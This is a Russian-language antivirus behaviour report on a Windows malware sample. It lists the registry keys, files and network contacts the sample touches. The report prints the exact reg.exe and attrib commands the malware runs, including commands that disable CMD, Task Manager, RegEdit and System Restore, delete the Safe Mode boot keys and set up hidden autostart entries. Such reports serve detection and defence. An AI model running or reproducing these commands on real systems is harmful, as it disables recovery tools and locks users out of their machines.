Техническая информация
Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
- [<HKLM>\SOFTWARE\Classes\.exe] '' = 'done by Blizzard'
- [<HKLM>\SOFTWARE\Classes\.bat] '' = 'done by Blizzard'
- [<HKLM>\SOFTWARE\Classes\.com] '' = 'done by Blizzard'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'cba4' = '%ALLUSERSPROFILE%\startm~1\Programme\Autostart"'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'cba' = '%TEMP%\bt2210.bat'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'cba2' = '%HOMEPATH%\startm~1\Programme\Autostart\%TEMP%\bt2210.bat'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'cba3' = '%ALLUSERSPROFILE%\Start Menu\Programs\Startup"'
Подменяет следующие исполняемые системные файлы:
- <SYSTEM32>\dllcache\shutdown.exe файлом <SYSTEM32>\dllcache\shutdown.exe.new
- <SYSTEM32>\shutdown.exe файлом <SYSTEM32>\shutdown.exe.new
Заражает следующие исполняемые файлы:
- <SYSTEM32>\dllcache\shutdown.exe.new
Вредоносные функции:
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
- Интерпретатора командной строки (CMD)
- Диспетчера задач (Taskmgr)
- Редактора реестра (RegEdit)
блокирует:
- Компонент восстановления системы (SR)
Запускает на исполнение:
- '<SYSTEM32>\attrib.exe' +R +S +H "%HOMEPATH%\startm~1\Programme\Autostart\C:\Documents and Settings\%USERNAME%\LOCALS~1\Temp\bt2210.bat"
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows Script Host\Settings" /v Timeout /t REG_DWORD /d "0" /f
- '<SYSTEM32>\attrib.exe' +R +S +H "%ALLUSERSPROFILE%\Start Menu\Programs\Startup\"
- '<SYSTEM32>\attrib.exe' +R +S +H "%ALLUSERSPROFILE%\startm~1\Programme\Autostart\"
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced" /v Start_ControlPanel /t REG_DWORD /d "0" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced" /v Start_Show_Search /t REG_DWORD /d "0" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows Script Host\Settings" /v Enabled /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d "1" /f
- '<SYSTEM32>\attrib.exe' +R +S +H %TEMP%\bt2210.bat
- '<SYSTEM32>\attrib.exe' -R -A -S -H MSDOS.SYS
- '<SYSTEM32>\attrib.exe' -R -A -S -H IO.SYS
- '<SYSTEM32>\attrib.exe' -R -A -S -H ntldr
- '<SYSTEM32>\attrib.exe' -R -A -S -H NTDETECT.COM
- '<SYSTEM32>\attrib.exe' -R -A -S -H AUTOEXEC.BAT
- '<SYSTEM32>\attrib.exe' -R -A -S -H boot.ini
- '<SYSTEM32>\attrib.exe' -R -A -S -H CONFIG.SYS
- '<SYSTEM32>\attrib.exe' -R -A -S -H bootfont.bin
- '<SYSTEM32>\reg.exe' add HKLM\Software\Policies\Microsoft\Windows\System\ /v DisableCMD /t REG_DWORD /d 2 /f
- '<SYSTEM32>\reg.exe' add HKCU\Software\Policies\Microsoft\Windows\System\ /v DisableCMD /t REG_DWORD /d 2 /f
- '<SYSTEM32>\reg.exe' add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v cba2 /t REG_SZ /d "%HOMEPATH%\startm~1\Programme\Autostart\C:\Documents and Settings\%USERNAME%\LOCALS~1\Temp\bt2210.bat"
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v cba /t REG_SZ /d "%TEMP%\bt2210.bat"
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v cba4 /t REG_SZ /d "%ALLUSERSPROFILE%\startm~1\Programme\Autostart\"
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v cba3 /t REG_SZ /d "%ALLUSERSPROFILE%\Start Menu\Programs\Startup\"
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableRegistryTools /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\control\safeboot\network" /f
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\currentcontrolset\control\safeboot\minimal" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced" /v Start_Show_Run /t REG_DWORD /d "0" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecycleFiles /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\WebView\BarricadedFolders" /v shell:Windows /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableRegistryTools /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\WebView\BarricadedFolders" /v shell:SystemDriveRootFolder /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\WebView\BarricadedFolders" /v shell:System /t REG_DWORD /d "1" /f
Изменения в файловой системе:
Создает следующие файлы:
- C:\boot.ini
- <Служебный элемент>
- %TEMP%\bt2210.bat
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\index[1].php
Присваивает атрибут 'скрытый' для следующих файлов:
- %TEMP%\bt2210.bat
Перемещает следующие системные файлы:
- <SYSTEM32>\shutdown.exe в <SYSTEM32>\shutdown.blizzard
Сетевая активность:
Подключается к:
- 'we###.n-m-b.info':80
- 'localhost':1035
TCP:
Запросы HTTP GET:
- we###.n-m-b.info/community/index.php
UDP:
- DNS ASK we###.n-m-b.info
Другое:
Ищет следующие окна:
- ClassName: 'MS_AutodialMonitor' WindowName: '(null)'
- ClassName: 'MS_WebcheckMonitor' WindowName: '(null)'
- ClassName: 'IEFrame' WindowName: '(null)'
- ClassName: '' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
